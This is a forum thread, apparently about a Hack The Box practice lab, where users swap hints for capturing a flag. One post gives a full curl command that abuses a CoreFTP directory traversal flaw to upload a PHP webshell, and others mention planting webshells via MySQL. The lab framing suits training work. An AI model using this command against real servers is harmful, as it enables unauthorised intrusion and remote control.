( You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer. )
ANYONE KNOW ABOUT THAT TOPIC? I uploaded webshell on site but only working two commands dir and whoami . Have anyone any references ?
have you tried the command more?
thanks for response . I have already find answer
This one was quite a mess. You see so many opportunities that your head spinning in every directions. After some time, i decided for myself to use the CoreFTP HTTP server directory traversal vulnerability. Then I started trying to upload wwwolf-php-webshell with curl (overkill):
curl -k -X PUT -H "Host: <IP>" --basic -u <user>:<password> -F 'fileX=@/path/to/wwwolf-php-webshell/webshell.php' 'https://IP/../../../../../..\xampp\htdocs\myshell.php'
After that its a breeze. just
dir "\flag.txt" on drive root with webshell UI
Would you be able to message me with more details of how you did this? how did you get a webshell to the \xampp\htdocs?
I got the flag with some help from a friend. There are at least two ways to get the flag. One way, the way that I had help with from a friend, does not require a webshell or a php-reverse-shell.
Message me if you need help.
The post that @subrealz made is pretty much on the right track, but I could not figure it out from that post. Honestly, I probably would have never figured out the solution without some help.
I managed to get the flag with a webshell that I uploaded via sql… It was limited and messy but it did the job.
I figured MySQL was the other path.